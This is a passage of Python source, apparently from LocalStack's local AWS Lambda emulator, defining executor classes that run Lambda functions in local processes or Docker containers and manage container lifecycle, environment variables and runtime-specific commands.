LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
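# Illustrative sketch, assuming `func_arn` is used as the lock_discriminator key:
# assure_lock_present() returns the lock already registered for that key, or registers
# the provided one (e.g., a Semaphore to cap concurrent asynchronous invocations):
#
#   lock = LAMBDA_ASYNC_LOCKS.assure_lock_present(func_arn, threading.Semaphore(2))
#   with lock:
#       ...  # run the invocation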
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, lambda_function: LambdaFunction):
# setup environment pre-defined variables for docker environment
result = lambda_function.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, lambda_function.region())
return result
def execute(
self,
func_arn: str, # TODO remove and get from lambda_function
lambda_function: LambdaFunction,
event: Dict,
context: LambdaContext = None,
version: str = None,
asynchronous: bool = False,
callback: Callable = None,
lock_discriminator: str = None,
):
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
inv_context = InvocationContext(
lambda_function, event=event, function_version=version, context=context
)
try:
result = self._execute(lambda_function, inv_context)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(
sqs_queue_arn, event, e
)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(lambda_function, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
lambda_function, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext):
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
# update handler
if inv_options.updated_handler:
inv_context.handler = inv_options.updated_handler
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
env_vars = inv_context.environment
runtime = lambda_function.runtime or ""
event = inv_context.event
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and lambda_function
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
self.apply_plugin_patches(inv_context)
if inv_context.docker_flags and config.LAMBDA_DOCKER_FLAGS:
inv_context.docker_flags = f"{config.LAMBDA_DOCKER_FLAGS} {inv_context.docker_flags}"
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
lambda_function,
inv_context,
stdin=event_stdin_bytes,
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(lambda_function, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(self, lambda_function: LambdaFunction, inv_context: InvocationContext):
runtime = lambda_function.runtime
handler = lambda_function.handler
environment = inv_context.environment = self._prepare_environment(lambda_function)
event = inv_context.event
context = inv_context.context
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info(
'Empty event body specified for invocation of Lambda "%s"' % lambda_function.arn()
)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
inv_context.event = event_bytes_for_stdin
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % lambda_function.arn())
result = self.run_lambda_executor(lambda_function=lambda_function, inv_context=inv_context)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
func_arn = lambda_function.arn()
lambda_cwd = lambda_function.cwd
runtime = lambda_function.runtime
env_vars = inv_context.environment
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
lambda_function, dict(env_vars), lambda_cwd, inv_context.docker_flags
)
if not inv_context.lambda_command and inv_context.handler:
command = container_info.entry_point.split()
command.append(inv_context.handler)
inv_context.lambda_command = command
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=inv_context.lambda_command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
"""
Prepares a persistent docker container for a specific function.
        :param lambda_function: The details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = lambda_function.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(lambda_function)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(lambda_function, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(
self,
lambda_function: LambdaFunction,
env_vars: Dict,
lambda_cwd: str,
docker_flags: str = None,
):
docker_image = Util.docker_image_for_lambda(lambda_function)
container_name = self.get_container_name(lambda_function.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=True,
name=container_name,
entrypoint="/bin/bash",
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug("Stopping container: %s" % container_name)
DOCKER_CLIENT.stop_container(container_name)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug("Removing container: %s" % container_name)
rm_docker_container(container_name, safe=True)
# clean up function invoke times, as some init logic depends on this
self.function_invoke_times.pop(func_arn, None)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
        :return: A list of LocalStack docker container names, one per function.
"""
with self.docker_container_lock:
LOG.debug("Getting all lambda containers names.")
list_result = DOCKER_CLIENT.list_containers(filter="name=localstack_lambda_*")
container_names = list(map(lambda container: container["name"], list_result))
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug("Removing %d containers." % len(container_names))
for container_name in container_names:
DOCKER_CLIENT.remove_container(container_name)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
container_status = DOCKER_CLIENT.get_container_status(container_name)
return container_status.value
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ""
# Get the container name.
container_name = self.get_container_name(func_arn)
container_network = DOCKER_CLIENT.get_network(container_name)
return container_network
def idle_container_destroyer(self):
"""
        Iterates through all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug("Checking if there are idle containers ...")
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
        Starts a repeating timer that re-invokes start_idle_container_destroyer_interval every 60 seconds,
        checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return "localstack_lambda_" + re.sub(r"[^a-zA-Z0-9_.-]", "_", func_arn)
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
# Tell Lambci to use STDIN for the event
environment["DOCKER_LAMBDA_USE_STDIN"] = "1"
return event_body.encode()
def execute_in_container(
self,
lambda_function: LambdaFunction,
inv_context: InvocationContext,
stdin=None,
background=False,
) -> Tuple[bytes, bytes]:
lambda_cwd = lambda_function.cwd
env_vars = inv_context.environment
entrypoint = None
if inv_context.lambda_command:
entrypoint = ""
elif inv_context.handler:
inv_context.lambda_command = inv_context.handler
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK or None
if network == "host":
port = get_free_tcp_port()
env_vars["DOCKER_LAMBDA_API_PORT"] = port
env_vars["DOCKER_LAMBDA_RUNTIME_PORT"] = port
additional_flags = inv_context.docker_flags or ""
dns = config.LAMBDA_DOCKER_DNS
docker_java_ports = PortMappings()
if Util.debug_java_port:
docker_java_ports.add(Util.debug_java_port)
docker_image = Util.docker_image_for_lambda(lambda_function)
if config.LAMBDA_REMOTE_DOCKER:
container_id = DOCKER_CLIENT.create_container(
image_name=docker_image,
interactive=True,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
ports=docker_java_ports,
command=inv_context.lambda_command,
)
DOCKER_CLIENT.copy_into_container(container_id, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER)
return DOCKER_CLIENT.start_container(
container_id, interactive=not background, attach=not background, stdin=stdin
)
else:
mount_volumes = None
if lambda_cwd:
mount_volumes = [
(Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
]
return DOCKER_CLIENT.run_container(
image_name=docker_image,
interactive=True,
detach=background,
entrypoint=entrypoint,
remove=True,
network=network,
env_vars=env_vars,
dns=dns,
additional_flags=additional_flags,
command=inv_context.lambda_command,
mount_volumes=mount_volumes,
stdin=stdin,
)
class LambdaExecutorLocal(LambdaExecutor):
def _execute_in_custom_runtime(
self, cmd: str, lambda_function: LambdaFunction = None
) -> InvocationResult:
"""
Generic run function for executing lambdas in custom runtimes.
:param cmd: the command to execute
:param lambda_function: function details
:return: the InvocationResult
"""
env_vars = lambda_function and lambda_function.envvars
kwargs = {"stdin": True, "inherit_env": True, "asynchronous": True, "env_vars": env_vars}
process = run(cmd, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate()
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
# TODO: not sure if this code is needed/used
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = lambda_function and lambda_function.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(lambda_function, log_output)
if return_code != 0:
raise InvocationException(
"Lambda process returned error status code: %s. Result: %s. Output:\n%s"
% (return_code, result, log_output),
log_output,
result,
)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def _execute(
self, lambda_function: LambdaFunction, inv_context: InvocationContext
) -> InvocationResult:
lambda_cwd = lambda_function.cwd
environment = self._prepare_environment(lambda_function)
if lambda_function.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(lambda_function.timeout)
context = inv_context.context
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_FUNCTION_MEMORY_SIZE"] = str(context.memory_limit_in_mb)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function_callable = lambda_function.function(inv_context.function_version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function_callable(inv_context.event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
lambda_function.arn(),
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
_store_logs(lambda_function, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s',
lambda_function.arn(),
error,
"".join(traceback.format_tb(error.__traceback__)),
)
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
lambda_function.envvars = lambda_function.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = lambda_function.handler
lambda_function.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
lambda_function, event, environment=lambda_function.envvars, lambda_command=cmd
)
self.apply_plugin_patches(inv_context)
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def execute_javascript_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
handler = lambda_function.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = (
"node -e 'require(\"%s\").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'"
% (
main_file,
function,
event_json_string,
context_json_string,
)
)
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
def execute_go_lambda(self, event, context, main_file, lambda_function: LambdaFunction = None):
if lambda_function:
lambda_function.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
lambda_function.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
else:
LOG.warning("Unable to get function details for local execution of Golang Lambda")
cmd = GO_LAMBDA_RUNTIME
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
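    # Illustrative sketch for the placeholder handling above (the option string is a
    # hypothetical example): with
    #   LAMBDA_JAVA_OPTS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=_debug_port_"
    # the "_debug_port_" token is replaced by a free local port, which is also kept in
    # cls.debug_java_port so the container executors can publish it.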
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.TMP_FOLDER, r"%s/\1" % config.HOST_TMP_FOLDER, path)
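    # Illustrative sketch of the rewrite above (folder values are assumptions, not taken
    # from this file): with config.TMP_FOLDER="/tmp/localstack" and
    # config.HOST_TMP_FOLDER="/home/user/.localstack/tmp", the path
    #   /tmp/localstack/zipfile.abc123  ->  /home/user/.localstack/tmp/zipfile.abc123
    # while paths outside of TMP_FOLDER are returned unchanged.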
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
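    # Illustrative sketch (assuming config.WINDOWS_DOCKER_MOUNT_PREFIX="/host_mnt"):
    #   C:\Users\me\lambda  ->  /host_mnt/C/Users/me/lambda
    # i.e. the drive colon is dropped, backslashes become forward slashes, and the
    # configured mount prefix is prepended.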
@classmethod
def docker_image_for_lambda(cls, lambda_function: LambdaFunction):
runtime = lambda_function.runtime or ""
if lambda_function.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = [
"dotnetcore2.0",
"dotnetcore2.1",
"python3.6",
"python3.7",
]
if docker_image == "lambci/lambda" and any(
img in docker_tag for img in lambdas_to_add_prefix
):
docker_tag = "20191117-%s" % docker_tag
if runtime == "nodejs14.x":
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
